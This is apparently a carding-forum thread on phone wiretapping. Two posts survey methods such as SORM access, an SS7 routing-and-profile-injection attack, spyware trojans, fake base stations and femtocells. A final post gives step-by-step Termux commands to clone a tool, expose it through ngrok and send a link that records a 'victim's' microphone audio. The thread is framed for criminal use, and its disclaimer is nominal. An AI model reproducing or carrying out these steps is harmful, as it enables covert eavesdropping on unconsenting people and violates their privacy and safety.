9 ways to wiretap your phone

[Carding 4 Carders]

1. SORM - official wiretapping
The most obvious way is official wiretapping by the state.

In many parts of the world, telephone companies are required to provide access to wiretapping lines for the competent authorities. For example, in Russia, in practice, this is done technically through SORM - a system of technical means for ensuring the functions of operational-search measures.

Each operator must install an integrated SORM module on his PBX.

If a telecom operator has not installed equipment on its PBX for wiretapping the phones of all users, its license in Russia will be canceled. Similar programs of total wiretapping operate in Kazakhstan, Ukraine, the USA, Great Britain (Interception Modernization Program, Tempora) and other countries.

The venality of government officials and intelligence officers is well known to all. If they have access to the system in "god mode", then for a fee you can get it too. As in all state systems, in the Russian SORM there is a big mess and typical Russian carelessness. Most of the technicians are in fact very low-skilled, which allows unauthorized access to the system without being noticed by the intelligence services themselves.

Telecom operators do not control when and which subscribers are listening on SORM lines. The operator does not check in any way if there is a court sanction for wiretapping a particular user.

“You take a certain criminal case about the investigation of an organized criminal group, which lists 10 numbers. You need to listen to a person who has nothing to do with this investigation. You just finish off this number and say that you have operative information that this is the number of one of the leaders of the criminal group, ”say knowledgeable people from the site “Agentura.ru”.

Thus, through SORM, you can listen to anyone on a "legal" basis. Here's a secure connection.

2. Wiretapping through the operator
Operators of cellular communications in general, without any problems, look at the list of calls and the history of movements of a mobile phone, which is registered in various base stations by its physical location. To receive call records, as with special services, the operator needs to connect to the SORM system.

Under the new Russian laws, operators will be required to store audio recordings of all users' conversations from six months to three years (the exact date is now being negotiated). The law comes into force in 2018.

3. Connection to the SS7 signal network
Knowing the victim's number, it is possible to wiretap the phone by connecting to the network operator of the cellular network through vulnerabilities in the SS7 signaling protocol (Signaling System No. 7).

Security experts describe this technique this way.

The attacker infiltrates the SS7 signaling network, in the channels of which he sends a Send Routing Info For SM (SRI4SM) service message, indicating the telephone number of the attacked subscriber A as a parameter. In response, the home network of subscriber A sends the attacker some technical information: IMSI (international subscriber identifier) and the address of the MSC, which is currently serving the subscriber.

Then the attacker, using the Insert Subscriber Data (ISD) message, injects the updated subscriber profile into the VLR database, changing the address of the billing system in it to the address of his pseudo-billing system. Then, when the attacked subscriber makes an outgoing call, his switch turns to the attacker's system instead of the real billing system, which gives the switch a directive to redirect the call to a third party, again controlled by the attacker. On this third party, a conference call is assembled from three subscribers, two of which are real (caller A and callee B), and the third one is unauthorized by an attacker and can listen and record the conversation.

The scheme is quite working. Experts say that when the SS7 signaling network was developed, it did not include mechanisms to protect against such attacks. The implication was that this system was already closed and protected from outside connections, but in practice, an attacker could find a way to join this signaling network.

You can connect to the SS7 network in any country in the world, for example, in a poor African country, and you will have access to switches of all operators in Russia, the USA, Europe and other countries. This method allows you to listen to any subscriber in the world, even on the other side of the world. Interception of incoming SMS from any subscriber is also carried out elementary, as well as transfer of balance via USSD request (for more details, see the speech of Sergei Puzankov and Dmitry Kurbatov at the PHDays IV hacker conference).

4. Connect to cable
From the documents of Edward Snowden it became known that the special services not only "officially" wiretap phones through communication switches, but also connect directly to fiber, recording all traffic in its entirety. This allows wiretapping of foreign operators who do not allow the official installation of wiretapping equipment on their PBXs.

This is probably a fairly rare practice for international espionage. Since ATEs in Russia already have listening equipment everywhere, there is no particular need to connect to fiber. Perhaps this method makes sense to use only for intercepting and recording traffic in local networks at local PBXs. For example, to record internal conversations in a company, if they are carried out within a local PBX or via VoIP.

5. Installing a spyware trojan
At the everyday level, the easiest way to listen to a user's conversations on a mobile phone, in Skype and other programs is to simply install a Trojan on his smartphone. This method is available to everyone; it does not require the powers of state special services or a court decision.

Abroad, law enforcement agencies often purchase special Trojans that use unknown 0day vulnerabilities in Android and iOS to install programs. Such Trojans are being developed by companies like the Gamma Group (FinFisher Trojan) commissioned by law enforcement agencies.

It makes little sense for Russian law enforcement agencies to install Trojans, unless they need the ability to activate the smartphone's microphone and record, even if the user is not talking on a mobile phone. In other cases, SORM copes with wiretapping. Therefore, the Russian special services are not very active in introducing Trojans. But for unofficial use, it is a favorite hacking tool.

Wives spy on their husbands, businessmen study the activities of competitors. In Russia, Trojan software is widely used for wiretapping by private clients.

The Trojan is installed on a smartphone in various ways: through a fake software update, through an email with a fake application, through a vulnerability in Android or in popular software such as iTunes.

New vulnerabilities in programs are found literally every day, and then very slowly they are closed. For example, the FinFisher Trojan was installed through a vulnerability in iTunes that Apple did not close from 2008 to 2011. Through this hole, any software on behalf of Apple could be installed on the victim's computer.

Perhaps such a Trojan is already installed on your smartphone. Don't you think your smartphone battery has been discharging a little faster than expected lately?

6. Application update
Instead of installing a special spyware Trojan, an attacker can do even smarter: choose an application that you yourself voluntarily install on your smartphone, and then give him all the authority to access phone calls, record conversations, and transfer data to a remote server.

For example, it could be a popular game that is distributed through the "left" catalogs of mobile applications. At first glance, this is an ordinary game, but with the function of wiretapping and recording conversations. Very comfortably. The user with his own hands allows the program to go online, where it sends files with recorded conversations.

Alternatively, malicious application functionality can be added as an update.

7. Fake base station
The fake base station has a stronger signal than the real BS. Due to this, it intercepts the traffic of subscribers and allows you to manipulate data on the phone. It is known that fake base stations are widely used by law enforcement agencies abroad.

A fake BS model called StingRay is popular in the USA.

And not only law enforcement agencies use such devices. For example, merchants in China often use fake BSs to send mass spam to mobile phones within a radius of hundreds of meters. In general, in China, the production of "fake honeycombs" is put on stream, so in local stores it is not a problem to find a similar device, assembled literally on the knee.

8. Hacking femtocell
Recently, some companies have been using femtocells - low-power miniature cellular stations that intercept traffic from mobile phones that are in range. Such a femtocell allows you to record calls from all company employees before redirecting calls to the base station of cellular operators.

Accordingly, to wiretap a subscriber, you need to install your own femtocell or hack the operator's original femtocell.

9. Mobile complex for remote listening
In this case, the radio antenna is installed near the subscriber (works at a distance of up to 500 meters). A directional antenna connected to a computer intercepts all phone signals, and at the end of the work it is simply taken away.

Unlike a fake femtocell or a Trojan, an attacker does not need to worry about breaking into the site and installing a femtocell, and then removing it (or removing the Trojan without leaving any traces of hacking).

The capabilities of modern PCs are enough to record a GSM signal on a large number of frequencies, and then break the encryption using rainbow tables (here is a description of the technique from a well-known specialist in this field, Carsten Noll).

If you voluntarily carry a universal bug with you, you automatically collect an extensive dossier on yourself. The only question is who will need this dossier. But if necessary, he can get it without much difficulty.

 

[Carding]

Is your phone being listened to?. Is your phone tapped?​

Many of the methods below are legitimate. But not all.

As a rule, if you are not doing anything illegal or are not under suspicion, then you will not be tapped. But this does not negate the chance of wiretapping by business competitors, criminals and other ill-wishers.

Just know all this information and sleep well.

SORM
The system of operational-search measures is an official, state, total wiretapping. In the Russian Federation, all telecom operators are required to install SORM on their automatic telephone exchanges and provide law enforcement agencies with access to user conversations and correspondence.

If the operator does not have SORM, he will not be issued a license. If he turns off SORM, the license is canceled. By the way, the same system operates not only in neighboring Kazakhstan and Ukraine, but also in the USA, Great Britain and many other countries.

SORM is usually divided into three generations:

• SORM 1 allows you to monitor analog communications, telephone conversations. It was developed in the 80s.
• SORM 2 is designed to listen to mobile communications and control Internet traffic. The second generation of SORM was introduced in 2000. The system includes a separate server connected to the FSB control panel and a ring buffer that must store all traffic passing through the provider for the last 12 hours.
• SORM 3 is the latest option that provides the integration of all the above systems and additionally controls some VPN servers, listens in real time to satellite communications, instant messengers, etc., stores metadata about calls, Internet sessions, transmitted messages, allows you to receive data from internal systems of the operator. SORM 3 began to be implemented in 2014.

Operators of the Russian Federation mainly use SORM 2. But in practice, 70% of companies have the system either does not work at all, or works with violations.

First of all, it is expensive to install SORM (and the operator must do this for his own money according to an individual plan approved by the local FSB department). It is easier for most operators to pay a fine of about 30 thousand rubles in accordance with Part 3 of Article 14.1 of the Administrative Offenses Code of the Russian Federation.

In addition, the operator's SORM may conflict with the FSB complexes. And because of this, it is technically impossible to record user traffic.

Operators do not control how the secret services use SORM. Accordingly, they cannot prohibit listening to your specific number.

However, for wiretapping, the special services formally need a court decision. In 2016, courts of general jurisdiction issued 893.1 thousand such permits to law enforcement agencies. In 2017, their number decreased, but not significantly.

However, it doesn't cost law enforcement officers anything to include someone's number in a wiretap kit as potentially suspicious. And cite an operational need.

In addition, the SORM security level is often low. So, there remains an opportunity for unauthorized connection - invisible to the operator, subscriber and special services.

The operators themselves can also view the history of calls, messages, smartphone movements across base stations.

Signal network SS7 (SS-7)
SS7, OKS-7, or signaling system # 7 is a set of signaling protocols that are used to configure PSTN and PLMN telephone exchanges around the world. Protocols use digital and analog channels to transmit control information.

Vulnerabilities in SS7 are found regularly. This allows hackers to connect to the operator's network and eavesdrop on your phone. Generally speaking, SS7 practically did not have security systems built in - it was initially believed that it was protected by default.

Typically, hackers infiltrate the SS7 network and send a Send Routing Info For SM (SRI4SM) service message over its channels. It specifies the wiretap number as a message parameter. In response, the subscriber's home network sends the IMSI (International Subscriber Identity) and the address of the MSC that is currently serving the subscriber.

After that, the hacker sends another message - Insert Subscriber Data (ISD). This allows him to penetrate the database and upload his address there instead of the subscriber's billing address.

When a subscriber makes a call, the switch refers to the hacker's address. As a result, a conference call is made with the participation of a third party (attacker), which can listen and record everything.

You can connect to SS7 anywhere. So the Russian number may well be broken from India, China, but even from distant hot Africa. By the way, SS7 allows you to use USSD requests to intercept SMS or transfer the balance.

In general, SS7 is the "mother of all holes" and the most vulnerable point of the mobile system. It is now used not only for wiretapping, but also for bypassing two-factor authentication. In other words, to access your bank accounts and other secured profiles.

Trojan Applications
This is just the simplest and most common way. It is much easier to install the application while the "half" is in the shower, or use social engineering methods to force you to follow the link, than to negotiate with the operatives and the FSB.

Applications allow you not only to record conversations on your mobile or read SMS. They can activate the microphone and camera to covertly listen and film everything that happens around them.

The most popular Trojan of this kind is FinFisher. In 2008-2011, it was installed on the iPhone through a hole in iTunes, which for some reason Apple did not close.

In 2011, the Egyptian government used FinFisher during the Arab Spring. Moreover, it acquired the official version for 287 thousand euros.

How can you be persuaded to install a spy for wiretapping? It can be an update of a popular game from the "left" catalog, an application with discounts, a fake for a system update.

By the way, law enforcement agencies also use spy apps - for example, when they cannot go the official way and obtain court permission. Trojans for 0day vulnerabilities in Android and iOS are a multimillion-dollar market, products based on it are in demand in many countries of the world.

Remote wiretapping
There are three options here - a mobile complex, a femtocell, or a fake base station. All of them are not cheap, so the average user will not be listened to like that. But still, we will tell you how it works.

The mobile complex is installed at a distance of up to 300-500 m from the listening smartphone. A directional antenna intercepts all signals, the computer stores and decodes them using rainbow tables or other technologies. When the wiretapping is over, the complex simply leaves.

The fake base station (IMSI interceptor) has a stronger signal than the real one. The smartphone sees that such a station will provide the best communication quality, and automatically connects to it. The station intercepts all data. The size of the station is slightly larger than a laptop. It costs from $ 600 (handicraft) to $ 1500-2000 (industrial versions).

By the way, fake stations are often used to send spam. In China, such devices are assembled by craftsmen and sold to companies that want to attract buyers. Often, counterfeit BSs are used in areas of hostilities to misinform the military or the population.

Femtocell is a smaller device. It is not as powerful as a full-fledged communication station, but it performs the same functions. Femtocells are usually installed by companies to listen to the traffic of their employees and partners. The data is intercepted before it is sent to the base stations of cellular operators. But the same femtocell can be installed for spot wiretapping.

Findings
Technically, the easiest and most versatile way of wiretapping is a mobile application. In which case, everything can be blamed on the subscriber: they say, he himself allowed access to the camera, microphone, sending data, etc. The rest of the methods are more for professionals or people who can pay for the services of professionals.

This article is presented for informational purposes only and does not constitute a call to action.

 

[Father]

Putting a powerful wiretap on someone else's phone

This article is presented for informational purposes only and does not carry a call to action.

Let's get started:

1.

• pkg upgrade
• pkg upgrade
• pkg install git
• pkg install php
• git clone https://github.com/thelinuxchoice/sayhello
• git clone https://github.com/Marcel0Sousa/termux-ngrok
• cd termux-ngrok
• ./termux-ngrok.sh (after that, write Y)
• cd
• cd usr
• cd bin
• cp ngrok /data/data/com.termux/files/home/sayhello/
• cd sayhello
• chmod +x sayhello.sh
• ./sayhello.sh

2. After that, you will open "sayHello".
We select Ngrok-02 in it and after a couple of seconds the link we need will be generated, in the screenshot-TYK it is circled in a red oval, it will need to be sent to the victim, and if she allows access to the microphone, then Audio file received will be written in Termux.

3. To transfer audio to the internal memory, write:

• termux-setup-storage

• cp[/CODE] (name of the audio file, you can see the name by writing ls)
/storage/emulated / 0/

After that, the audio files will be saved in the format .wav files, and you can find them in the internal memory.

 

[wireshark]

more?